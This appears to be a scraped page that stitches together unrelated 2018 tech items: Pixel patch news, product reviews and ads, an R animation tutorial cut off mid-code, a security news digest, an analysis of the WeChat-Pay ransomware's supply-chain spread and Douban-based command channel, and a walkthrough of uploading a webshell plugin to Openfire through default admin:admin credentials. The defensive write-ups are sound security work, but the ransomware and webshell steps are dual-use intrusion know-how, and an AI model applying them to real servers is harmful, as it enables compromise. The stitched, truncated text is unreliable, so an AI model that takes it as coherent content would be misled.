Performance | Improve unlocking performance when using Bluetooth | Pixel, Pixel XL, Pixel 2, Pixel 2 XL, Pixel 3, Pixel 3 XL

The first patch on the list is something Pixel owners have been complaining about for a while. Google stuck with 4GB of RAM on the Pixel 3, and the aggressive RAM management forces apps to close prematurely. This can be annoying when switching between apps frequently. They also "improved" the performance of the camera, which was another common complaint.

Pixel 3 XDA Forum Pixel 3 XL XDA Forum

The OTA files and factory images for the Pixel and Nexus devices can be found at the links below. Find the Android security files for your device and click "Link" to start the download. To flash the update manually without losing all of your data, follow the steps outlined in this tutorial.

Arlo's new security camera has a 4K sensor and built-in spotlight


A more technically impressive device than the Arlo or Arlo Pro cameras, the Ultra is a high-end indoor and outdoor solution for smart home security. The 4K lens, which has a 180-degree diagonal field of view, makes it easy to zoom in on small details in captured footage. The camera is also smart enough to spot action on its own with audio and motion detection. When it identifies someone or something of interest, the Ultra can start blaring a siren, turn on its bright spotlight, or even call 911 for you.

To get the most out of the Arlo Ultra, you'll have to combine the camera with the company's subscription service, Arlo Smart. You'll get one year free if you buy the camera but will have to fork over at least $29 per year after that, depending on what types of features you're looking for. It's worth noting that the free year of the Smart subscription will only save your footage in 1080p, not the full 4K resolution that the camera is capable of. For that, you'll need to purchase another add-on. Alternatively, you can use an SD card to save the footage locally.

A single Arlo Ultra camera will run $400, and you can save a little when you purchase a multi-camera system. Arlo is offering bundles of up to four cameras. While the company's security suite is generally well-regarded, it suffered some significant outages earlier this year that knocked cameras offline.

What is Data Sprawl?


Imagine that you need to complete your taxes, but all your relevant papers are secreted in drawers, hidden in closets, and stuffed under couch cushions. Now imagine that you have multiple copies of the forms in these places, and some are written in Greek, while others are written in English and Spanish. How will you do your taxes, or clean your house for that matter, when this is the state of things? Unfortunately, this is a problem that is starting to plague companies across the world. This is data sprawl.

Data sprawl refers to the overwhelming amount and variety of data produced by enterprises every day. With the growing number of operating systems, data warehouses, various BYOD (Bring Your Own Device) devices, and enterprise and mobile applications, it’s no wonder that the proliferation of data is becoming a problem.

The problem of data sprawl is twofold:

Getting value from your data. One issue is that the data is spread out across many data stores, and on different devices and servers. This makes it incredibly difficult to get value from your data. How can you perform comprehensive analytics when your data may be stored across many locations, or is duplicated in locations, and is in different formats? How will you gather all this information in one place? How will you get your data into a similar format so that you can compare apples to apples?

Security. Data sprawl also creates security concerns. BYOD proliferating in the workforce means that endpoints must be secured, even as data is leaving your network via an array of devices. But what about your servers and data stores that are maintained by different departments? Are these systems secure? Do they all follow the same compliance requirements? Is personally identifiable information (PII) being removed when moving data from one system to another? Is the data encrypted when it's being shared across systems? These are all security concerns that are magnified by data sprawl.

Why does data sprawl happen?

Data sprawl happens for many reasons.

Employees may bring an array of devices to work and use those devices for work purposes.

There are vast numbers of new data sources available from many places, such as JSON files, new RDBMS sources, or streaming data from traffic sensors, health sensors, transaction logs, and activity logs.

Your company may use varied operating systems such as Windows, Mac, and Linux.

Your data may be stored in a variety of data storage systems across your network and the cloud.

Your data might be siloed, so that it is stored in multiple places based on department, geography, or some combination of these.

Your data may be duplicated across numerous systems and use a range of formatting.

How can you manage data sprawl?

There are a number of tools to handle the security aspect of data sprawl. For example, there are many DLP (Data Loss Prevention) tools that help identify sensitive data in your network and ensure that it doesn’t leave your network in non-secure ways. Popular vendors include Checkpoint , Forcepoint , and Symantec .

For cloud tools, there are single sign-on tools that help employees to seamlessly access cloud applications outside of the network while maintaining a secured sign-on. Popular vendors include JumpCloud , Microsoft Azure , Okta , and Onelogin . This can help control the security for BYOD devices.

But what about how data sprawl affects the way you do business? What tools are available to help you handle your data, get it in one place, remove duplicates, and ensure that it's secure while you move it? A powerful ETL (Extract, Transform, and Load) tool can help you bring your data together where you can analyze it. As you move the data, you can cleanse it, remove duplicates, and transform the data types so the data formatting is aligned. Popular vendors include Alooma, IBM InfoSphere, Informatica, and Talend.
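To make the "transform and deduplicate as you move it" idea concrete, here is a minimal sketch in R using readr and dplyr rather than any particular vendor's pipeline; the file names, column names and type conversions are hypothetical:

library(readr)
library(dplyr)

# Hypothetical extracts from two siloed systems; read everything as character
# so the two files can be combined regardless of how each system formats values
crm  <- read_csv("crm_customers.csv",     col_types = cols(.default = col_character()))
shop <- read_csv("webshop_customers.csv", col_types = cols(.default = col_character()))

cleaned <- bind_rows(crm, shop) %>%
  # align formats: parse dates and normalise names so records can be compared
  mutate(signup_date = as.Date(signup_date),
         name        = trimws(tolower(name))) %>%
  # drop records duplicated across the two systems
  distinct(customer_id, name, signup_date, .keep_all = TRUE)

# load the cleansed, combined data into a single analytics store
write_csv(cleaned, "customers_clean.csv")

A real ETL product wraps the same steps (extract, align, deduplicate, load) in connectors, scheduling and monitoring, but the underlying work is of this shape.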

The Alooma difference

Alooma is an ETL data pipeline designed to help you handle data sprawl issues by getting your data into one place securely. Alooma brings all your data sources together into data warehouses like Azure, BigQuery, Redshift, and Snowflake, or cloud storage like Amazon S3. It can also handle the widest range of data sources ― flat files, RDBMS, S3 buckets, CSVs, among others.

Alooma can help you cleanse your data and align your data types on the fly while you move data to the target store. And Alooma can do this in near real time, so that you can make decisions at the speed of business.

Not only can Alooma help you bring your data together, but security is a cornerstone of Alooma's business. Alooma meets critical compliance regulations, including SOC 2 Type II, HIPAA, GDPR, and the EU-US Privacy Shield Framework, and supports OAuth 2.0. In addition, data is encrypted in motion and at rest.

Are you ready to rein in your data sprawl? Contact Alooma today to see how we can help!

Optus Wholesale signs network partner deal with Transatel for Australia


Optus Wholesale has secured an agreement as the Australian network partner for European mobile virtual network company, Transatel, currently expanding its global network coverage to support its Internet of Things (IoT) offering.

Under the three-year agreement, Transatel will leverage the Optus mobile network to deliver an inbound data roaming solution for its customers’ end users in Australia.

Optus says the agreement is the first of its kind from Optus Wholesale and represents a major step forward in the evolution of its wholesale IoT product suite, “helping organisations unlock the value of networks in today’s connected and global economies”.

Along with the inbound roaming access, Optus Wholesale will also provide operational and business support to Transatel.

“Optus Wholesale is delighted to be appointed as Transatel’s exclusive network partner in Australia,” said John Castro, Acting Managing Director of Optus Wholesale and Satellite.

“The agreement between Optus and Transatel provides a foundation for global connectivity in Australia, helping industries and consumers capitalise on the growing IoT market. It ensures continuity of service and availability at a time when network connectivity is essential to nearly every facet of modern life.”

“Transatel prides itself in offering some of the industry’s most flexible and universal cellular connectivity solutions for MVNO businesses and the emerging IoT sector,” said Jacques Bonifay, Transatel CEO.

“Our commitment to delivering these services meant the reach and capabilities of the Optus network, along with the company’s continued investment in building next generation networks, were all significant factors in our decision.

“We’re excited to partner with Optus Wholesale in preparing the future of the IoT and cellular connectivity.”

47 REASONS TO ATTEND YOW! 2018

With 4 keynotes + 33 talks + 10 in-depth workshops from world-class speakers, YOW! is your chance to learn more about the latest software trends, practices and technologies and interact with many of the people who created them.

Speakers this year include Anita Sengupta (Rocket Scientist and Sr. VP Engineering at Hyperloop One), Brendan Gregg (Sr. Performance Architect Netflix), Jessica Kerr (Developer, Speaker, Writer and Lead Engineer at Atomist) and Kent Beck (Author Extreme Programming, Test Driven Development).

YOW! 2018 is a great place to network with the best and brightest software developers in Australia. You’ll be amazed by the great ideas (and perhaps great talent) you’ll take back to the office!

Register now for YOW! Conference

Sydney 29-30 November

Brisbane 3-4 December

Melbourne 6-7 December

Register now for YOW! Workshops

Sydney 27-28 November

Melbourne 4-5 December

REGISTER NOW!

LEARN HOW TO REDUCE YOUR RISK OF A CYBER ATTACK

Australia is a cyber espionage hot spot.

As we automate, script and move to the cloud, more and more businesses are reliant on infrastructure that has the high potential to be exposed to risk.

It only takes one awry email to expose an accounts payable process, and for cyber attackers to cost a business thousands of dollars.

In the free white paper ‘6 Steps to Improve your Business Cyber Security’ you’ll learn some simple steps you should be taking to prevent devastating and malicious cyber attacks from destroying your business.

Cyber security can no longer be ignored. In this white paper you’ll learn:

How does business security get breached?

What can it cost to get it wrong?

6 actionable tips

DOWNLOAD NOW!

Don't casually log in to free WiFi in public places


Original title: Don't casually log in to free WiFi in public places

Another massive leak of user information has hit the global information security world. Marriott International recently disclosed that a guest reservation database at its Starwood hotels had been breached, and the information of roughly 500 million guests may have been exposed. Industry insiders say the online black market has already formed a complete industrial chain, with a scale exceeding 100 billion yuan.

Roughly 500 million guests' information may have been leaked

The investigation showed that an unauthorized party had been intruding into the Starwood hotel network since 2014. The information that may have been leaked includes guests' names, dates of birth, phone numbers, passport numbers, mailing addresses, email addresses, Starwood VIP guest information and other personal details. For some guests, the leaked information even includes payment card numbers and expiration dates, although that data was encrypted.

Information security has become a hot topic for governments, enterprises and individual users alike. According to the latest Q3 2018 network security supervision report for the information and communications industry released by China's Ministry of Industry and Information Technology, relevant state departments handled roughly 33.97 million network security threats in the third quarter, including malicious network resources, malware and security vulnerabilities. In the same quarter, the National Industrial Information Security Development Research Center detected 105 new vulnerabilities related to industrial control systems, smart devices and the Internet of Things, while the China Academy of Information and Communications Technology, continuously monitoring 126 domains and nearly 1.7 million IP addresses across 31 industrial internet platforms, found more than 2,600 suspected risks.

Finance and healthcare suffer the worst leaks

Figures suggest the online data black market has reached a scale of 100 billion yuan. According to information security experts at 360, leaks happen through technical means, including hacking, software vulnerabilities and malicious trojans, and through non-technical means, including insider leaks and unintentional disclosure. By industry, finance remains the hardest hit, with 24% of data breach incidents involving financial institutions, followed by healthcare at 15%, retail at 15% and the public sector at 12%.

Four main channels of personal information leakage

First, a trojanized app is downloaded onto the phone.

Second, a phishing website is inadvertently visited while browsing.

Third, information entered when registering accounts on websites: if the site's database is not secure enough, a successful attack on the site exposes users' personal information.

Fourth, some password-free public WiFi hotspots may be rogue (phishing) WiFi.

Precautions: make passwords as complex as possible and change them regularly

Security experts advise individuals to raise their security awareness and take sensible measures to keep a data breach from escalating. Users should use multiple independent, strong passwords graded by how important a site or device is, change them regularly, and promptly check public breach-notification sites to see whether their own data is affected. Specifically:

1. Use different user names and passwords for bank accounts, payment accounts and ordinary website memberships, and change the passwords regularly;

2. Build personal passwords from a mix of upper-case letters, lower-case letters, digits and other characters;

3. Carefully check a site's legitimacy before entering an ID card number, bank card number or banking password;

4. Do not log in to unknown WiFi at will, and never open links in suspicious text messages;

5. Do not casually download unknown software; install a mobile security suite, scan for and remove trojans promptly, and block phishing links.

(Editors: Bi Lei, Yang Bo)


Animating regression models in R using broom and ggplot2


My first article on Towards Data Science was the result of a little exercise I set myself to keep the little grey cells ticking over. This is something of a similar exercise, albeit a bit more relevant to a project I’ve been working on. As I spend my time working in a marketing department, I have to get used to wearing [at least] two hats.

Often, these hats are mutually exclusive, and sometimes they disagree with each other. In this case, the disagreement is in the form of another piece of animated data visualisation. As with the animated Scottish rugby champions graph, this example doesn’t really benefit from adding the animation as another dimension to the plot.

The graph is simply to show the trends for some metrics to do with UK university fundraising over time. I only really need x and y to represent the value and the year, but where's the fun in that? That's the sort of thing we can plot ridiculously easily using ggplot2:

ggplot(fund_tidy, aes(x = year, y = value, colour = kpi)) + geom_line()

Why not use this as a bit more of a learning exercise? I’ve played about with the gganimate package before, but never really spent any quality time with it. This seemed like a good opportunity.

The dataviz conflict

And that brings us on to the butting of hats. I don’t think that an animated plot is the best way to represent these data. I don’t know if it technically counts as non-data ink, but you get the idea: it’s just not necessary. If x and y were already taken and I wanted to show how those two values changed over time, animation presents those changes in a way that’s easy to understand. In this case, it’s redundant.

For further adventures where marketing meets data science, follow Chris on Twitter.

However, a lot of graphs are made not to represent the data as simply and accurately as possible, but to get attention. In many cases, particularly in the world of the marketing agency, there is a tendency to turn what could be presented as a clear, straightforward bar chart, into a full-on novelty infographic. Tourist footfall over time represented as a cartoon foot with the size of the toe representing the value for each year anyone? But that’s a story for another day.

The truth is, animation catches the eye, and it can increase the dwell time, allowing the reader time to take in the title, axes labelling, legends and the message. Possibly. As well as increasing exposure to any branding. I do have some principles though, so I wouldn’t ever intentionally set out to make a graph that was misleading. Playing with the colour schemes and layout to make it look a bit sleeker? Absolutely, but the data has to come first.

A CASE of trends

I had been doing some university fundraising work looking at historic Ross-CASE reports , and thought it would be interesting to look at how some of the key performance indicators had changed over time. I’d looked at some of the main ones before, but hadn’t looked at a few others, and thought it might be interesting to look at them together. And it would be some good ggplot2 and gganimate practice. So let us begin.

N.b. the aim of this exercise was to compare underlying trends and spend more time with gganimate, not to produce a publication-quality figure; hence a somewhat ‘cavalier’ attitude to y axis labelling!

No onion skinning here

As ever, importing my pre-made dataset and having a quick look was first on the agenda:

# import yearly data (total, summed values, not means or medians)
# dataset compiled from historical Ross-CASE reports
library(readr)
fund_df <- read_csv("year_sum.csv")

# quick look at data
library(dplyr)
glimpse(fund_df)

Observations: 12
Variables: 6
$ year               <int> 2005, 2006, 2007, 2008, 2009, 2...
$ new_funds_raised   <int> 452, 548, 682, 532, 600, 693, 7...
$ cash_received      <int> 324, 413, 438, 511, 506, 560, 5...
$ fundraising_staff  <int> 660, 734, 851, 913, 1043, 1079,...
$ contactable_alumni <dbl> 5.7, 6.2, 6.9, 7.7, 8.3, 8.0, 8...
$ contact_alum_x100  <dbl> 570, 620, 690, 770, 830, 800, 8...

library(ggplot2)
ggplot(fund_df, aes(x = year, y = new_funds_raised)) +
  geom_line()

Okay, we have a dataset that seems to look how I would expect it to from previous work, so hopefully I’ve not screwed things up at the first hurdle. Onward!

As the values for contactable_alumni were a couple of orders of magnitude away from the rest of the values, I created a new column where those were multiplied by 100 to put them on the same scale. I then gathered the data into a tidy, ‘long’, format:

# create contactable alumni x100 variable to place values on equivalent scale
fund_df <- fund_df %>%
  mutate(contact_alum_x100 = contactable_alumni * 100)

# create tidy dataframe
library(tidyr)
fund_tidy <- fund_df %>%
  gather(kpi, value, -year) %>%
  mutate(kpi = as.factor(kpi))

glimpse(fund_tidy)

Observations: 60
Variables: 3
$ year  <int> 2005, 2006, 2007, 2008, 2009, 2010, 2011, 20...
$ kpi   <fct> new_funds_raised, new_funds_raised, new_fund...
$ value <dbl> 452, 548, 682, 532, 600, 693, 774, 681, 807,...

With the data transformed, we were ready to create our first animated plot, remembering to start by filtering out our original contactable_alumni variable:

# create animated plot
library(gganimate)
library(transformr)

first_animate <- fund_tidy %>%
  filter(kpi != "contactable_alumni") %>%
  ggplot(aes(x = year, y = value, colour = kpi)) +
  geom_line() +
  # this next line is where the magic happens:
  transition_reveal(kpi, year) +
  labs(title = "Trends in University Fundraising KPIs Over Time",
       subtitle = "Data from Ross-CASE reports",
       x = "Year",
       y = 'Value',
       caption = "y axis labelling omitted due to differences in scale between KPIs",
       colour = "KPI") +
  scale_colour_discrete(labels = c("Cash received", "Contactable alumni",
                                   "Fundraising staff", "New funds raised")) +
  scale_y_discrete(labels = NULL) +
  theme_chris()

And we’re off. But is that as good as it could be? I don’t think so. The main thing for me is that, as we’re interested in trends, we should have trendlines on there as well. How to go about that…?

To do that in a non-animated way, we’d simply add a geom_smooth() to our plotting code:

# create non-animated plot with trendlines
fund_tidy %>% f
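As a rough sketch, and assuming the same fund_tidy data and the same filter as the animated version, the static plot with trendlines might look something like this; the geom_smooth() settings are an assumption rather than the author's code:

# sketch: static version of the plot with linear trendlines added
fund_tidy %>%
  filter(kpi != "contactable_alumni") %>%
  ggplot(aes(x = year, y = value, colour = kpi)) +
  geom_line() +
  geom_smooth(method = "lm", se = FALSE)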

BUF Breakfast | Apple finally gives in to the Indian government, agreeing to allow an anti-spam app; domestic ransomware outbreak, Tencent overnight releases ...


Good morning, Buffers. Today is Tuesday, December 4, 2018, the 27th day of the tenth lunar month. In today's breakfast: Apple finally gives in to the Indian government and agrees to allow an anti-spam app; warning: customer service staff may be able to see what you type in real time; domestic ransomware outbreak, Tencent releases a decryption tool overnight; the Network Security Bureau of the Ministry of Public Security publishes the draft "Guidelines for the Protection of Personal Information Security on the Internet" for public comment; Chinese cyber espionage surges again after Trump takes office.

Apple finally gives in to the Indian government and agrees to allow its anti-spam app

After years of waiting in vain for Apple to implement anti-spam measures on the iPhone, India's telecom regulator TRAI threatened in July that if Apple did not approve the anti-harassment app developed by the Indian government by January 2019, iPhones would be banned from India's cellular networks.

With the deadline approaching, Apple's spokesperson in India confirmed that the app is now available in the iOS App Store. The DND registration app uses the call and SMS reporting framework Apple recently introduced in iOS, tying reports directly into the Phone and Messages apps and sharing only the spam content with the Indian government. After a user flags a spam call or message, DND automatically creates a complaint and sends it to the corresponding carrier for handling, all free of charge.

The TRAI DND app is a free download in the iOS App Store and requires iOS 12.1 or later. [ ithome ]

Warning: customer service staff may be able to see what you type in real time

According to the automotive blog Electrek, a Tesla owner successfully hacked his Model 3 and turned it into an expensive "Ubuntu computer".

Compared with the Model S and Model X, the Model 3 is harder to crack. Nevertheless, Reddit user trsohmers pulled it off and posted a video showing that he had obtained root, booted Ubuntu, and could even watch YouTube videos. He said the hack built on work by the well-known teardown site Ingineerix.

Ingineerix had already completed a hack earlier and entered "factory mode"; however, despite successfully attacking the Model 3's MCU, it could not access the Autopilot computer. [ ithome ]

Domestic ransomware outbreak: Tencent releases a decryption tool overnight

In recent days, many computers have been infected with a new ransomware strain, the first to demand ransom via WeChat QR-code payments. After emergency handling, the Tencent PC Manager team has cracked the virus and released a test version of a decryption tool overnight.

After infecting a system, the ransomware encrypts valuable data such as txt and Office documents (unlike other ransomware, it does not change the original file extensions) and drops a shortcut on the desktop reading "Your computer files have been encrypted, click here to decrypt". Its source of propagation is an Easy Language (易语言) program called "账号操作V3.1" ("Account Operations V3.1"); the distributor also abused several similar grey-market tools. The program's advertised function is logging into and switching between multiple QQ accounts.

The tool is used by people working in the grey-market industry. Many of the tools they use get flagged by antivirus software, so they routinely ignore the interception warnings. As a result, this ransomware's targeted spread among grey-market operators proved very effective. [ cnbeta ]

The Network Security Bureau of the Ministry of Public Security publishes the draft "Guidelines for the Protection of Personal Information Security on the Internet" for public comment

To further implement the Cybersecurity Law, guide internet companies in establishing sound management systems and technical measures for protecting citizens' personal information, effectively prevent violations of citizens' personal information, and safeguard network data security and citizens' lawful rights, public security organs drew on their experience investigating cybercrimes involving personal information and their security supervision work, and organized experts from the Beijing Network Industry Association, Beijing University of Posts and Telecommunications, and the Third Research Institute of the Ministry of Public Security to draft the "Guidelines for the Protection of Personal Information Security on the Internet (Draft for Comment)".

To build consensus, further refine the protective measures, and better guide internet companies and users in protecting personal information, the draft is now open for broad public comment. The public can read the draft on the "National Internet Security Management Service Platform" ( http://www.beian.gov.cn ); suggestions can be sent by email to [emailprotected] or by fax to 010-66262319. [ beian ]

Chinese cyber espionage surges again after Trump takes office

Three years ago, U.S. President Barack Obama reached an agreement with China that almost nobody thought possible: President Xi Jinping agreed to end China's years-long practice of breaking into the computer systems of American companies, military contractors and government agencies to obtain designs, technology and corporate secrets, usually for the benefit of Chinese state-owned enterprises. The deal was one of the first agreements to control behaviour in cyberspace.

For roughly 18 months, the number of Chinese attacks dropped sharply. But soon after President Trump took office, Chinese cyber espionage picked up again and, according to intelligence officials and analysts, accelerated over the past year as trade conflicts and other tensions began to undermine relations between the world's two largest economies.

Trump and administration officials often say that all of China's efforts to acquire technology amount to theft. In doing so, they blur the line between stealing technology and negotiated deals in which companies agree to transfer technology to Chinese manufacturing or marketing partners in exchange for access to the Chinese market.

That practice is often seen by American companies as a form of corporate extortion, while the theft of industrial designs and intellectual property, whether blueprints for power plants, high-efficiency solar panels or the F-35 fighter jet, is a long-standing problem.

The U.S. Trade Representative published a report this month detailing past and present cases. But the administration has never said whether combating theft and cyberattacks will be part of the negotiations, or whether it will simply demand that China stop the illicit activity it already acknowledged in the Obama era.

But as Trump and Xi prepare to meet this weekend at the G20 leaders' summit in Argentina, Chinese corporate espionage has again become a central American complaint. U.S. trade and intelligence officials, as well as experts at private cybersecurity firms, acknowledge that the earlier agreement has completely broken down. They agree that this makes it harder to imagine any new deal between Trump and Xi serving as a permanent solution to a problem that has persisted for years and seems rooted in starkly different views of what constitutes fair competition. [ nytimes ]

"微信支付"勒索病毒愈演愈烈 边勒索边窃取支付宝密码

Thanks to Huorong Security for the submission.

I. Overview

The "WeChat Pay" ransomware that broke out on December 1 is spreading fast, and the number of infected computers keeps growing. The gang behind it compromised and abused Douban as a C&C channel; besides locking victims' files for ransom (the payment channel has since been shut down), it also steals Alipay and other account passwords on a large scale. First, the virus cleverly spreads through "supply chain pollution" and has already infected tens of thousands of computers, with the infection still expanding.

Second, the virus also steals users' account passwords for a range of services, including Taobao, Tmall, Aliwangwang, Alipay, 163 Mail, Baidu Netdisk, JD and QQ.

The Huorong team strongly recommends that infected users change the passwords for the platforms above as soon as possible, in addition to removing the virus and decrypting the locked files.

Figure: daily infection counts, peaking at 13,134 machines (data obtained from the virus's server)

According to the Huorong security team's analysis, the virus author first attacks the computers of software developers, infecting a module of the "Easy Language" (易语言) environment they use for programming, so that every program those developers build with Easy Language carries the ransomware. Users who download these "poisoned" programs are then infected. The overall propagation is simple, but polluting Easy Language first and infecting software through it is fairly unusual. As of December 3, more than twenty thousand users had been infected, and the number of infected computers is still rising.

Figure: supply chain pollution process

In addition, the Huorong team found that the author uses Douban and other platforms as C&C servers for issuing commands. By decrypting the issued commands, the team gained access to one of the virus's back-end servers and found that the author had quietly collected tens of thousands of Taobao, Tmall and other account records.

II. Sample analysis

Recently, Huorong tracked the ransomware Bcrypt, which uses WeChat QR-code scanning to collect ransom payments, spreading widely around December 1, with the number of infected users surging in a short time. Huorong's tracing found that the virus spreads so quickly because it propagates through supply chain pollution: once run, it infects the Easy Language core static library and the Jingyi (精易) module, so every Easy Language program compiled after infection carries the virus code. The supply chain pollution flow is shown below:

Supply chain pollution flow chart

Malicious code inserted after the build environment is infected

The Easy Language malicious code inserted into the Jingyi module is shown below:

Malicious code in the Jingyi module

Easy Language programs compiled in an infected build environment have download code added. The code first fetches a set of encrypted download configurations over HTTP, then downloads virus files from the decrypted URLs and runs them locally. As the red box above shows, what gets downloaded and executed is a "white plus black" pair of programs: svchost is the clean (whitelisted) file mentioned in earlier reports, and when it runs it loads and executes the malicious code stored in libcef.dll. The code that downloads and runs the virus is shown below:

Code that downloads the virus files

The request URLs in the virus code include a Douban link and a GitHub link with identical content; the Douban link serves as the example here. As shown below:

Content of the requested page

After decryption, the data above yields a set of download configurations. As shown below:

Decrypted download configuration

The decryption code is shown below:

Decryption code

Using the download address in the configuration, we can fetch the data file, which has two parts: a JPG image and the virus payload data. The data file is shown below:

Data file

libcef.dll

Once the malicious code in libcef.dll runs, it first requests a Douban note link ( https://www.douban.com/note/69 *56/). The logic matches the virus code inserted into the infected Easy Language build environment: the data stored at the Douban link can be decrypted into a set of download configurations. The decrypted configuration is shown below:

Download configuration

The download code is shown below:

The effective malicious data extracted from the download contains the Easy Language core static library and the Jingyi module used to infect the build environment. In addition, the downloaded payload contains a Zip archive; combined with the generic download logic in the virus code, that Zip archive could be swapped for any virus program. Because the author uses supply chain pollution to spread, the infection count grows exponentially. The relevant code is shown below:

Locating the payload archive and writing the file back

By sifting through the encrypted download configurations stored at Douban links, we found that another Douban note ( https://www.douban.com/note/69 *26/) holds the Bcrypt ransomware spread through this supply chain. The download configuration is shown below:

Download configuration

After the virus modules' JPG extension, the actual file names used when the ransomware is dropped are annotated with "_". The directory layout of the downloaded ransomware archive is shown below:

Directory layout of the ransomware archive

III. Analysis of virus-related data

From the encrypted data the author stored at numerous URLs, Huorong decrypted the login credentials of two MySQL servers used by the author. We successfully logged into one of them. Looking through the database, we found that the virus modules distributed via this supply chain include at least ransomware, account-stealing trojans and adult video-player software.

On the server we also found keylogger records uploaded by the account-stealing trojan, covering Taobao, Tmall, Aliwangwang, Alipay, 163 Mail, Baidu Netdisk, JD, QQ and other accounts, more than twenty thousand entries in total.

We also found the infection data uploaded by the Bcrypt ransomware. From this single server's data alone, we counted 23,081 infected machines (as of the afternoon of December 3).

Daily infection counts are shown below:

Daily infections

The cumulative infection chart is shown below:

Total infections

Huorong can now detect and remove infected Easy Language library files of this kind. Developers with an Easy Language build environment are advised to install Huorong Security and run a full scan. A screenshot of the scan is shown below:

Huorong detection screenshot

IV. Appendix

Sample SHA256:



Web Security: Reproducing the Openfire Plugin Script Upload Vulnerability


*Author: si1ence. This article belongs to the CodeSec original reward program; reproduction without permission is prohibited.

Preface

By chance I discovered that a web server had been compromised and a cryptomining virus had been planted on it. After spending quite a while cleaning up the virus, I started thinking about how the machine had been broken into in the first place; as the saying goes, if you're going to die, at least die knowing why.

The server only exposed its web port to the internet, so my initial suspicion was that the intrusion came through the web service. A scan with D Shield (D盾) indeed found a webshell, but its path was under the Openfire directory. I had never touched Openfire before, so I dug into it.

0x1 What Openfire does

Openfire is a server-side implementation of an IM server based on the XMPP protocol. Although two users can exchange messages peer-to-peer once connected, they still need to connect to the server to obtain connection and communication information, so the server side has to exist. Openfire provides some basic features, but they really are basic. Fortunately, it also supports plugin extensions; like Spark, it strongly encourages adding new functionality through plugins rather than by modifying the source code.

A quick search on Zoomeye shows it is quite widely deployed:

0x2 Tracing the intrusion

Since this was a production environment I couldn't poke around freely, so I went to the webshell's directory and found a package called helloworld.jar. Opening it showed that this jar was the real upload. I then downloaded the latest version of Openfire from the official site and installed it locally to test.

It is just an exe installer you click through. After installation it goes straight into the configuration wizard; the two key steps are captured below:

It then enters an administrator configuration page. To be honest I had no idea what it was for, so I just clicked next, next and skipped through it.

After installation, on the login page, entering the username and password admin:admin logged me straight in, no friction at all.

There is a plugins page. Following the approach found via Google, and using the helloword.jar file saved from the compromised server, I tried uploading it: the upload succeeded.

Switching to the user interface settings page and clicking through, I could directly access the webshell's content:

A quick check of privileges showed the shell runs as the user running Openfire, an administrative SYSTEM account; this trick really works.
0x3 Analysis

I looked at what exactly the helloword package contains; it resembles the directory structure of a servlet-based web application.

The plugin.xml file's Url points to chakan.jsp, but I could not find that jsp anywhere under the web directory; meanwhile the flagged sqzr.jsp did not appear to have been executed at all.

Per the hints in the xml:

Main plugin class, i.e. the full class path of the plugin:

com.iteye.redhacker.openfire.plugin.helloWorldPlugin

Only then did I discover that the source of chakan.jsp had already been compiled into class files.

In web.xml the plugin also defines servlet-mappings, so all requests for resources under this path are handled by chakan.jsp and update2.jsp.

The administrator's username and password are stored in plaintext in the database:

0x4 Summary

1. Disaster accumulates from tiny oversights. When configuring application systems you really cannot afford to be careless; skipping one small step may mean giving up a big step in security.

2. If the big webshell sqzr.jsp had not been flagged by the initial scan, the investigation would probably have taken a long time; webshells packaged inside war and jar files remain fairly troublesome to detect and remove.

*Author: si1ence. This article belongs to the CodeSec original reward program; reproduction without permission is prohibited.

December 2018 security patch now rolling out for Pixel devices

Load it up! December 2018 security patch now rolling out for Pixel devices

The latest patch addresses the Pixel 3 RAM management issues, along with some general improvements for all Pixel devices.

Marc Lagace

3 Dec 2018

Google is rolling out the last batch of security updates for 2018. Officially announced on December 3, the latest security patch delivers general security patches for some remote and local flaws affecting all Android devices, and also includes a number of updates and fixes specifically targeting Pixel devices.

Google said it would address RAM management issues on the Pixel 3 back in early November, and the fix has arrived with the December security update. The update is said to improve memory performance in certain circumstances, which addresses reports from Pixel 3 users of the phone mismanaging memory to save battery in odd ways, such as killing a music app left running in the background as soon as the camera was launched.

Other fixes affecting Pixel devices include updates from both HTC and Qualcomm for low-level device drivers and bootloaders. Updated Pixel devices will also get camera improvements and improved Android Auto compatibility, Bluetooth patches, and improved notifications when using the Pixel Stand.

Both the factory images and OTA files are live right now, meaning you can already flash the patch to your phone if you don't feel like waiting for the over-the-air update to hit your phone.
